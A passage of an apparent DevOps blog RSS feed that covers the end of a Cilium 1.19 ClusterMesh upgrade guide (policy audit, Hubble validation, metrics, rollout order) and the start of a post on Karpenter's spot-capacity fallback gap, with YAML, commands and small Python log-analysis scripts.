<p>The only line in that table that silently breaks a naive upgrade is the first one. Everything else either preserves behavior (deprecation warnings), is opt-in (strict ingress), or is a known API removal (BGP v1) that surfaces loudly.</p>
<h2 id="h2-pre-flight-on-the-live-118-cluster" class="group relative scroll-mt-24">
        <a href="#h2-pre-flight-on-the-live-118-cluster" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Pre-flight on the live 1.18 cluster
        </a>
        </h2><p>The command that matters:</p>
<pre><code class="hljs language-bash">cilium clustermesh inspect-policy-default-local-cluster --all-namespaces
</code></pre><p>This walks every CiliumNetworkPolicy in the cluster, identifies selectors that would implicitly match across clusters in 1.18, and lists them. The output is your migration TODO. You will not get a second chance to run it after upgrade, because once you are on 1.19 the implicit matches no longer exist to inspect.</p>
<p>For each policy in the output, decide:</p>
<ul>
<li><strong>The cross-cluster match was intentional.</strong> Add <code>io.cilium.k8s.policy.cluster: &quot;*&quot;</code> to the selector, or list the specific cluster names. Keep behavior identical post-upgrade.</li>
<li><strong>The cross-cluster match was accidental.</strong> Do nothing. 1.19 will tighten the policy to local-only, which is what you wanted anyway.</li>
</ul>
<p>If your audit produces a list you can&#39;t finish in a maintenance window, set the escape hatch:</p>
<pre><code class="hljs language-yaml"><span class="hljs-comment"># values.yaml on the upgrade</span>
<span class="hljs-attr">clustermesh:</span>
  <span class="hljs-attr">policyDefaultLocalCluster:</span> <span class="hljs-literal">false</span>   <span class="hljs-comment"># keep 1.18 semantics for one release</span>
</code></pre><p>This is a one-release stay of execution. You upgrade to 1.19, run with 1.18 policy semantics, finish migrating the policies, then flip <code>policyDefaultLocalCluster: true</code> and validate. Don&#39;t let it sit there past one release.</p>
<h2 id="h2-detecting-drops-with-hubble" class="group relative scroll-mt-24">
        <a href="#h2-detecting-drops-with-hubble" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Detecting drops with Hubble
        </a>
        </h2><p>You will need Hubble both for pre-flight validation and post-upgrade verification.</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Cross-cluster traffic that currently works, BEFORE upgrade.</span>
<span class="hljs-comment"># Capture a representative window — a full day if your workload is daily-batchy.</span>
hubble observe \
  --cluster &lt;remote-cluster-name&gt; \
  --verdict FORWARDED \
  --since 24h \
  --output jsonpb &gt; pre-upgrade-east-west.jsonl
</code></pre><p>Save that file. It is the ground truth of what worked. Post-upgrade, you re-run the equivalent query and diff. Any traffic that was FORWARDED before and is now DROPPED is a policy you missed.</p>
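<p>A byte-for-byte diff of two Hubble captures is mostly noise, because timestamps, pod names and source ports change on every flow. The following added example (not part of the original post) reduces each flow to a key built from namespace, identity labels, protocol and destination port, then reports keys that were FORWARDED in <code>pre-upgrade-east-west.jsonl</code> and are DROPPED afterwards. The JSON field names (<code>flow</code>, <code>verdict</code>, <code>is_reply</code>, <code>source</code>, <code>destination</code>, <code>l4</code>) are assumptions based on Hubble's flow output, and the sample flows are constructed.</p>

```python
import json


def endpoint_key(endpoint):
    """Namespace plus sorted identity labels: stable across pod restarts."""
    endpoint = endpoint or {}
    return endpoint.get("namespace", ""), tuple(sorted(endpoint.get("labels") or []))


def flow_key(line):
    """Return (verdict, key) for one jsonpb line, or None if it should be skipped."""
    try:
        flow = json.loads(line)["flow"]
    except (ValueError, KeyError, TypeError):
        return None  # blank line, non-JSON noise, or a record without a flow
    # Replies carry an ephemeral destination port and would never match (assumed field).
    if not isinstance(flow, dict) or flow.get("is_reply"):
        return None
    l4 = flow.get("l4") or {}
    proto, port = "other", 0
    for name in ("TCP", "UDP", "SCTP"):
        if name in l4:
            proto, port = name, (l4[name] or {}).get("destination_port", 0)
            break
    key = endpoint_key(flow.get("source")) + endpoint_key(flow.get("destination")) + (proto, port)
    return flow.get("verdict", ""), key


def verdict_sets(lines):
    """Group the distinct flow keys of a capture by verdict."""
    sets = {}
    for line in lines:
        parsed = flow_key(line)
        if parsed:
            sets.setdefault(parsed[0], set()).add(parsed[1])
    return sets


def compare(pre_lines, post_lines):
    """regressed: forwarded before, dropped now. unseen: forwarded before, absent now."""
    before = verdict_sets(pre_lines).get("FORWARDED", set())
    after = verdict_sets(post_lines)
    dropped = after.get("DROPPED", set())
    forwarded = after.get("FORWARDED", set())
    return {
        "regressed": sorted(before.intersection(dropped)),
        "unseen": sorted(before.difference(dropped).difference(forwarded)),
    }


def sample_line(verdict, src_labels, dst_labels, port, reply=False):
    """Build one constructed jsonpb-style line for the demo below."""
    return json.dumps({"time": "2026-01-01T00:00:00Z", "flow": {
        "verdict": verdict, "is_reply": reply,
        "source": {"namespace": "shop", "labels": src_labels, "pod_name": "pod-a"},
        "destination": {"namespace": "shop", "labels": dst_labels, "pod_name": "pod-b"},
        "l4": {"TCP": {"source_port": 40000, "destination_port": port}},
    }})


# Constructed label sets; cluster names other than cluster-east are made up.
WEB_EAST = ["k8s:app=web", "k8s:io.cilium.k8s.policy.cluster=cluster-east"]
BATCH_EAST = ["k8s:app=batch", "k8s:io.cilium.k8s.policy.cluster=cluster-east"]
API_WEST = ["k8s:app=api", "k8s:io.cilium.k8s.policy.cluster=cluster-west"]

PRE = [
    sample_line("FORWARDED", WEB_EAST, API_WEST, 8080),
    sample_line("FORWARDED", API_WEST, WEB_EAST, 40000, reply=True),
    sample_line("FORWARDED", BATCH_EAST, API_WEST, 9090),
    sample_line("FORWARDED", WEB_EAST, API_WEST, 5432),
]
POST = [
    sample_line("DROPPED", list(reversed(WEB_EAST)), API_WEST, 8080),
    sample_line("FORWARDED", WEB_EAST, API_WEST, 5432),
    "not json",
]

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as pre, open(sys.argv[2]) as post:
            result = compare(pre, post)
    else:
        result = compare(PRE, POST)
    for bucket, keys in result.items():
        for key in keys:
            print(bucket, key)
```

<p>An <code>unseen</code> entry is not proof of a drop: the workload may simply not have run during the post-upgrade window, which is why the baseline should cover a full batch cycle. Hubble answers <code>--since</code> from a bounded in-memory buffer on each node, so confirm the capture actually spans the window you asked for.</p>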
<p>After upgrade, watch for policy drops with the originating rule attribution (1.19 includes the rule name in drop events, which 1.18 did not):</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Policy drops with rule names</span>
hubble observe --verdict DROPPED --<span class="hljs-built_in">type</span> policy-verdict --since 10m -f
</code></pre><p>Strict-encryption-specific filters added in 1.19 (PR <code>#43096</code>):</p>
<pre><code class="hljs language-bash">hubble observe --unencrypted --since 5m   <span class="hljs-comment"># cleartext flows</span>
hubble observe --encrypted                <span class="hljs-comment"># encrypted flows</span>
</code></pre><p>These filters are useful even if you are not flipping strict mode, because they confirm encryption is happening where you expect it.</p>
<h2 id="h2-prometheus-metrics-worth-alerting-on" class="group relative scroll-mt-24">
        <a href="#h2-prometheus-metrics-worth-alerting-on" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prometheus metrics worth alerting on
        </a>
        </h2><pre><code class="hljs language-promql"># Sudden policy-drop spike after upgrade
rate(cilium_drop_count_total{reason=&quot;Policy denied&quot;}[5m])

# Forward/drop ratio inversion is the clearest &quot;something broke&quot; signal
sum(rate(cilium_forward_count_total[5m]))
  /
sum(rate(cilium_drop_count_total[5m]))

# IPsec health (worth watching if you are running encryption at all,
# strict or not)
cilium_ipsec_xfrm_error
cilium_ipsec_xfrm_states{direction=&quot;in&quot;}

# Confirm transparent encryption is on where you expect
cilium_feature_datapath_transparent_encryption{mode=&quot;wireguard&quot;}
</code></pre><p>The metric names have shifted a bit across releases. The 1.19 metrics reference documents the current set. If you have alerts on <code>cilium_policy_l7_denied_total</code> from older docs, double-check the metric is still emitted under that exact name on 1.19 before relying on it.</p>
<h2 id="h2-the-safe-enable-order" class="group relative scroll-mt-24">
        <a href="#h2-the-safe-enable-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The safe enable-order
        </a>
        </h2><p>Sequence the upgrade so each change is isolated. The whole sequence is one release cycle, not one maintenance window.</p>
<pre><code class="hljs language-text">Day 0 (1.18, planning)
  - Run: cilium clustermesh inspect-policy-default-local-cluster --all-namespaces
  - Audit. Add io.cilium.k8s.policy.cluster selectors to policies that
    intentionally cross clusters.
  - Capture a baseline:
      hubble observe --cluster &lt;remote&gt; --verdict FORWARDED --since 24h
        &gt; pre-upgrade-east-west.jsonl
  - Rename any encryption.strictMode.* Helm keys to encryption.strictMode.egress.*

Day 1 (1.18 to 1.19 upgrade)
  - helm upgrade with:
      clustermesh.policyDefaultLocalCluster: false
      encryption.strictMode.ingress.enabled: false
  - Validate connectivity unchanged.

Day 1+1h (post-upgrade gate)
  - Re-run hubble observe --cluster &lt;remote&gt; --verdict FORWARDED.
    Diff against pre-upgrade-east-west.jsonl. Should be approximately identical.
  - hubble observe --verdict DROPPED --type policy-verdict.
    Quiet for legitimate traffic.

Day 7 (audit complete)
  - Flip clustermesh.policyDefaultLocalCluster: true
  - Watch cilium_drop_count_total{reason=&quot;Policy denied&quot;} for an hour.
    Spikes mean a policy still relies on implicit cross-cluster.

Day 8+ (optional strict encryption rollout)
  - If you want strict ingress encryption, enable it on one node first
    via per-node config override.
  - hubble observe --unencrypted should be quiet for that node&#x27;s
    workloads.
  - Roll node by node.
</code></pre><p>A small thing that matters: do not flip <code>policyDefaultLocalCluster</code> and enable ingress strict mode in the same change window. You cannot tell which one caused a drop if both fire at once.</p>
<h2 id="h2-recovery-if-you-skipped-the-audit" class="group relative scroll-mt-24">
        <a href="#h2-recovery-if-you-skipped-the-audit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Recovery, if you skipped the audit
        </a>
        </h2><p>If you have already upgraded without running the inspect command and traffic is being dropped:</p>
<ol>
<li>Roll out the Helm value <code>clustermesh.policyDefaultLocalCluster: false</code>. This restores 1.18 semantics, and East/West traffic resumes.</li>
<li>Run <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code> (it works on 1.19 too, it just lists policies that <em>would</em> differ if you flipped the default).</li>
<li>Migrate the policies.</li>
<li>Flip the value back to <code>true</code>.</li>
</ol>
<p>This is recoverable. It is also avoidable. Run the inspect command on 1.18 and you skip the firefight.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The 1.19 ClusterMesh policy-default flip is the one upgrade item that silently breaks production. The encryption strict-mode changes are knobs, not defaults. The order of operations to upgrade cleanly:</p>
<ol>
<li>Audit policies on 1.18 with <code>cilium clustermesh inspect-policy-default-local-cluster --all-namespaces</code>. Add explicit <code>io.cilium.k8s.policy.cluster</code> selectors where cross-cluster traffic was intentional.</li>
<li>Upgrade with <code>clustermesh.policyDefaultLocalCluster: false</code> as a one-release escape hatch.</li>
<li>Rename any deprecated <code>encryption.strictMode.*</code> Helm keys to <code>encryption.strictMode.egress.*</code>.</li>
<li>Validate post-upgrade with Hubble against a pre-upgrade traffic capture.</li>
<li>Flip <code>policyDefaultLocalCluster</code> back to <code>true</code> once the audit is complete and traffic is clean.</li>
<li>Roll ingress strict encryption separately, node by node, only after the policy migration has settled.</li>
</ol>
<p>The hardest part of this upgrade is not the upgrade. It is the audit. Run the inspect command on your live 1.18 cluster today, before the maintenance window. The rest of the steps are mechanical.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Karpenter Spot Storm Fallback Gap: The Production Loop Nobody Talks About]]></title>
      <link>https://devops-daily.com/posts/karpenter-spot-storm-fallback-gap</link>
      <description><![CDATA[When AWS spot capacity dries up in a region, Karpenter does not automatically fall back to on-demand. It retries the same dying offerings on a 3-minute loop. Here is why, and how to design around it.]]></description>
      <pubDate>Mon, 18 May 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/karpenter-spot-storm-fallback-gap</guid>
      <category><![CDATA[Kubernetes]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Kubernetes]]></category><category><![CDATA[Karpenter]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Spot Instances]]></category><category><![CDATA[Autoscaling]]></category><category><![CDATA[SRE]]></category>
      <content:encoded><![CDATA[<p>Karpenter sells itself as the smart spot handler for Kubernetes on AWS. Wide instance-type pools, fast bin-packing, automatic interruption draining. Most of the time it lives up to that pitch. Then your region enters a spot-capacity storm at 3pm on a Tuesday, half your nodes get reclaimed in fifteen minutes, and Karpenter keeps trying to launch fresh spot nodes that EC2 immediately refuses. Pods stay Pending for an hour. On-demand capacity sits right there. Karpenter never touches it.</p>
<p>This post is a walk through that scenario: what Karpenter is actually doing during a storm, why the maintainers consider it intentional, the workarounds that hold up in production, and the metrics that catch the loop before your customers do.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Karpenter caches &quot;unavailable&quot; spot offerings (instance-type plus AZ plus capacity-type) for a hard-coded 3 minutes, then retries. During a regional storm the retries fail again, and the loop repeats.</li>
<li>Fallback to on-demand fires only when every compatible spot offering in a single NodePool gets ICE&#39;d (rejected with an insufficient-capacity error) inside the same scheduling pass. It does not fire on interruption rate.</li>
<li>Maintainers have closed the obvious &quot;automatic spot-interruption fallback&quot; feature request (<code>#8298</code>) as working-as-intended. The official answer is: use wider requirements, <code>minValues</code>, and weighted NodePools.</li>
<li>Production posture today: a weighted spot NodePool with <code>minValues</code> across multiple instance families, a separate on-demand NodePool tainted with <code>karpenter.sh/capacity-type=on-demand:NoSchedule</code>, and alerts on <code>karpenter_cloudprovider_errors_total</code> plus <code>karpenter_nodeclaims_disrupted_total{reason=&quot;interruption&quot;}</code>.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A cluster running Karpenter (this post references v1 APIs; the behavior is the same on v0.32+ NodePools).</li>
<li>Familiarity with NodePool, NodeClass, and the v1 <code>requirements</code> schema.</li>
<li>Prometheus scraping Karpenter&#39;s <code>/metrics</code> endpoint.</li>
<li>Cluster-admin or comparable RBAC for editing NodePools.</li>
</ul>
<h2 id="h2-the-exact-behavior-during-a-storm" class="group relative scroll-mt-24">
        <a href="#h2-the-exact-behavior-during-a-storm" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The exact behavior during a storm
        </a>
        </h2><p>When <code>CreateFleet</code> returns <code>InsufficientInstanceCapacity</code>, <code>UnfulfillableCapacity</code>, or <code>MaxSpotInstanceCountExceeded</code>, Karpenter writes a log line like this and removes the offering from its in-memory pool:</p>
<pre><code class="hljs language-text">&quot;message&quot;:&quot;failed launching nodeclaim&quot;,
&quot;aws-error-code&quot;:&quot;UnfulfillableCapacity&quot;,
&quot;aws-operation-name&quot;:&quot;CreateFleet&quot;,
&quot;error&quot;:&quot;... InsufficientInstanceCapacity: We currently do not have sufficient c7i.xlarge capacity in the Availability Zone you requested (us-east-1f) ...&quot;

&quot;message&quot;:&quot;removing offering from offerings&quot;,
&quot;reason&quot;:&quot;MaxSpotInstanceCountExceeded&quot;,
&quot;instance-type&quot;:&quot;r8i-flex.xlarge&quot;,&quot;zone&quot;:&quot;us-east-1d&quot;,
&quot;capacity-type&quot;:&quot;spot&quot;,&quot;ttl&quot;:&quot;3m0s&quot;
</code></pre><p>That 3-minute TTL is a hard-coded constant in <code>pkg/cache/cache.go</code>. Three minutes later the offering is back in the pool. Karpenter tries it again. EC2 still does not have spot capacity for <code>c7i.xlarge</code> in <code>us-east-1f</code>. Same log lines. Same eviction. Same wait.</p>
<p>Meanwhile the pods stay Pending. Even if you wrote a second NodePool that allows on-demand, Karpenter will not automatically prefer it during the loop. From maintainer <code>DerekFrank</code> on <code>kubernetes-sigs/karpenter#2275</code>:</p>
<blockquote>
<p>If there aren&#39;t any on-demand <code>g4dn.xlarge</code> instances available in <code>us-east-1a</code>, it doesn&#39;t matter if Karpenter is trying to launch those from NodePool 1 or from NodePool 2. Karpenter won&#39;t retry simply because you have two NodePools.</p>
</blockquote>
<p>The unit of fallback is the <strong>offering</strong>, not the NodePool. A NodePool that requires <code>karpenter.sh/capacity-type In [spot]</code> will never produce an on-demand node, no matter how long the storm lasts. The second NodePool exists, but the scheduler picks based on per-offering availability and per-NodePool weight, not on a &quot;this NodePool is failing, switch&quot; signal.</p>
<p>The clearest reproduction is in <code>aws/karpenter-provider-aws#8885</code>: an Orca Security engineer ran a 1000-replica nginx deployment against weighted spot and on-demand NodePools during a real us-east-1 spot storm. 471 pods stayed Pending for more than an hour. The on-demand NodePool was untouched.</p>
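<p>The loop described above leaves a recognizable trace in the controller log: the same offering is removed, comes back when its TTL expires, and is removed again. The following added example (not Karpenter's own code) groups <code>removing offering from offerings</code> entries by instance type, zone and capacity type and flags offerings that were re-removed shortly after each TTL expiry. It assumes one JSON object per log line with an ISO 8601 <code>time</code> field; the other field names come from the excerpt above, and the sample lines are constructed.</p>

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

REMOVED = "removing offering from offerings"
UNITS = {"h": 3600.0, "m": 60.0, "s": 1.0, "ms": 0.001}


def parse_go_duration(text):
    """Convert a Go duration string such as '3m0s' to a timedelta."""
    parts = re.findall(r"(\d+(?:\.\d+)?)(ms|h|m|s)", text)
    return timedelta(seconds=sum(float(n) * UNITS[u] for n, u in parts))


def retry_loops(log_lines, min_repeats=3):
    """Map offering to the longest run of removals that each followed a TTL expiry."""
    removals = defaultdict(list)
    for line in log_lines:
        try:
            entry = json.loads(line)
            if entry.get("message") != REMOVED:
                continue
            # 'time' is an assumed field name for the log timestamp.
            when = datetime.fromisoformat(entry["time"].replace("Z", "+00:00"))
        except (ValueError, KeyError, AttributeError):
            continue  # non-JSON line, or an entry without a usable timestamp
        offering = (entry.get("instance-type"), entry.get("zone"), entry.get("capacity-type"))
        removals[offering].append((when, parse_go_duration(entry.get("ttl", "3m0s"))))

    loops = {}
    for offering, events in removals.items():
        events.sort(key=lambda event: event[0])
        run = best = 1
        for previous, current in zip(events, events[1:]):
            gap = current[0] - previous[0]
            ttl = previous[1]
            # Removed again between one and two TTLs later: the offering came
            # back into the pool, was retried, and failed the same way.
            if gap >= ttl and 2 * ttl >= gap:
                run += 1
            else:
                run = 1
            best = max(best, run)
        if best >= min_repeats:
            loops[offering] = best
    return loops


def sample(time, instance_type, zone, reason="UnfulfillableCapacity"):
    """Build one constructed log line with the fields shown in the excerpt."""
    return json.dumps({
        "time": time, "message": REMOVED, "reason": reason,
        "instance-type": instance_type, "zone": zone,
        "capacity-type": "spot", "ttl": "3m0s",
    })


# Constructed log: one offering stuck in the loop, one removed once,
# one removed twice but more than an hour apart, plus unrelated lines.
SAMPLE_LOG = [
    sample("2026-01-01T15:00:05Z", "c7i.xlarge", "us-east-1f"),
    sample("2026-01-01T15:03:20Z", "c7i.xlarge", "us-east-1f"),
    sample("2026-01-01T15:06:41Z", "c7i.xlarge", "us-east-1f"),
    sample("2026-01-01T15:09:58Z", "c7i.xlarge", "us-east-1f"),
    sample("2026-01-01T15:01:00Z", "r8i-flex.xlarge", "us-east-1d", "MaxSpotInstanceCountExceeded"),
    sample("2026-01-01T15:00:30Z", "m6i.large", "us-east-1a"),
    sample("2026-01-01T16:10:00Z", "m6i.large", "us-east-1a"),
    json.dumps({"time": "2026-01-01T15:00:04Z", "message": "failed launching nodeclaim"}),
    "plain text line",
]

if __name__ == "__main__":
    for offering, count in retry_loops(SAMPLE_LOG).items():
        print(offering, "removed", count, "times in a row")
```

<p>When every spot offering a pending pod could use shows up in this result, widening requirements will not help and the workload needs an explicit on-demand path.</p>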
<h2 id="h2-why-the-maintainers-consider-this-intentional" class="group relative scroll-mt-24">
        <a href="#h2-why-the-maintainers-consider-this-intentional" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why the maintainers consider this intentional
        </a>
        </h2><p>Two design positions, both still standing as of writing:</p>
<p><strong>The 3-minute TTL is a feature, not a bug.</strong> From <code>jmdeal</code> on <code>#8298</code>:</p>
<blockquote>
<p>Karpenter does keep track of spot interruption events, but a spot interruption will only cause the instance type to be excluded from launch requests for 3 minutes. Spot availability can change quickly, so we don&#39;t want to opt out of using spot for too long.</p>
</blockquote>
<p>The argument is that AWS spot pools recover fast. If Karpenter dropped the offering for an hour after one ICE event, you would miss capacity coming back online. So the cache stays short.</p>
<p><strong>The official solution is wide requirements plus <code>minValues</code>, not automatic fallback.</strong> Karpenter assumes that if you give EC2 enough latitude in the <code>CreateFleet</code> call (many instance families, multiple sizes, multiple AZs), the price-capacity-optimized strategy will find a spot pool with capacity. Issue <code>#8298</code>, which asked for &quot;automatic spot interruption detection and on-demand fallback,&quot; was closed without implementation.</p>
<p>This is internally consistent. It is also a bad fit for two real-world scenarios:</p>
<ol>
<li><strong>Workloads with narrow instance-type constraints.</strong> GPU pods, license-pinned workloads, anything that pins to a specific family. The pool of compatible offerings is small. When it dries up, there is nothing for <code>CreateFleet</code> to fall back to within the spot capacity-type.</li>
<li><strong>Regional spot storms.</strong> When a whole region has spot pressure, widening requirements does not help. Every family is ICE&#39;d.</li>
</ol>
<p>For both cases you need an explicit fallback path. Karpenter will not build it for you.</p>
<h2 id="h2-workaround-1-weighted-nodepools-with-wide-requirements" class="group relative scroll-mt-24">
        <a href="#h2-workaround-1-weighted-nodepools-with-wide-requirements" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 1: weighted NodePools with wide requirements
        </a>
        </h2><p>The official pattern. The spot NodePool runs at high weight and very wide requirements. The on-demand NodePool runs at low weight and is intended as the safety net.</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">spot</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">100</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;spot&quot;</span>]
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-family</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;c7i&quot;</span>, <span class="hljs-string">&quot;c6i&quot;</span>, <span class="hljs-string">&quot;m7i&quot;</span>, <span class="hljs-string">&quot;m6i&quot;</span>, <span class="hljs-string">&quot;r7i&quot;</span>, <span class="hljs-string">&quot;r6i&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">6</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-cpu</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;2&quot;</span>, <span class="hljs-string">&quot;4&quot;</span>, <span class="hljs-string">&quot;8&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">3</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">kubernetes.io/arch</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;amd64&quot;</span>]
      <span class="hljs-attr">nodeClassRef:</span>
        <span class="hljs-attr">group:</span> <span class="hljs-string">karpenter.k8s.aws</span>
        <span class="hljs-attr">kind:</span> <span class="hljs-string">EC2NodeClass</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">default</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">on-demand-fallback</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;on-demand&quot;</span>]
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-family</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;c7i&quot;</span>, <span class="hljs-string">&quot;c6i&quot;</span>, <span class="hljs-string">&quot;m7i&quot;</span>, <span class="hljs-string">&quot;m6i&quot;</span>, <span class="hljs-string">&quot;r7i&quot;</span>, <span class="hljs-string">&quot;r6i&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">6</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.k8s.aws/instance-cpu</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;2&quot;</span>, <span class="hljs-string">&quot;4&quot;</span>, <span class="hljs-string">&quot;8&quot;</span>]
          <span class="hljs-attr">minValues:</span> <span class="hljs-number">3</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">kubernetes.io/arch</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;amd64&quot;</span>]
      <span class="hljs-attr">nodeClassRef:</span>
        <span class="hljs-attr">group:</span> <span class="hljs-string">karpenter.k8s.aws</span>
        <span class="hljs-attr">kind:</span> <span class="hljs-string">EC2NodeClass</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">default</span>
</code></pre><p>The <code>minValues</code> requirement is the single most important knob during a storm. <code>minValues: 6</code> on <code>instance-family</code> forces <code>CreateFleet</code> to evaluate six different families in the same call. EC2&#39;s price-capacity-optimized strategy picks whichever has capacity. You go from &quot;the c7i pool is empty, fail&quot; to &quot;the c7i pool is empty, try m7i, m6i, r7i, r6i, c6i.&quot;</p>
<p>Caveat from the Karpenter docs themselves: weighted NodePools are a preference, not a policy.</p>
<blockquote>
<p>Based on the way that Karpenter performs pod batching and bin packing, it is not guaranteed that Karpenter will always choose the highest priority NodePool given specific requirements.</p>
</blockquote>
<p>Treat weight as a tiebreaker that mostly works, not a guarantee.</p>
<h2 id="h2-workaround-2-capacity-type-taint-on-the-on-demand-pool" class="group relative scroll-mt-24">
        <a href="#h2-workaround-2-capacity-type-taint-on-the-on-demand-pool" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Workaround 2: capacity-type taint on the on-demand pool
        </a>
        </h2><p>Without a taint, pods can land on either NodePool. With a heavy spot workload that occasionally bursts to on-demand, you want pods to prefer spot even when on-demand is available. A taint on the on-demand NodePool forces an explicit toleration:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">karpenter.sh/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NodePool</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">on-demand-fallback</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">weight:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">taints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">value:</span> <span class="hljs-string">on-demand</span>
          <span class="hljs-attr">effect:</span> <span class="hljs-string">NoSchedule</span>
      <span class="hljs-attr">requirements:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
          <span class="hljs-attr">operator:</span> <span class="hljs-string">In</span>
          <span class="hljs-attr">values:</span> [<span class="hljs-string">&quot;on-demand&quot;</span>]
        <span class="hljs-comment"># ... family/cpu/arch as above</span>
</code></pre><p>Workloads that should fail over add the toleration:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tolerations:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">karpenter.sh/capacity-type</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Equal</span>
      <span class="hljs-attr">value:</span> <span class="hljs-string">on-demand</span>
      <span class="hljs-attr">effect:</span> <span class="hljs-string">NoSchedule</span>
</code></pre><p>This gives you two benefits. First, on-demand becomes opt-in per workload, so a misconfigured deployment cannot accidentally burn money. Second, your dashboards now show &quot;on-demand nodes provisioned&quot; as a clean signal that fallback fired, since on-demand only happens for tolerating workloads.</p>
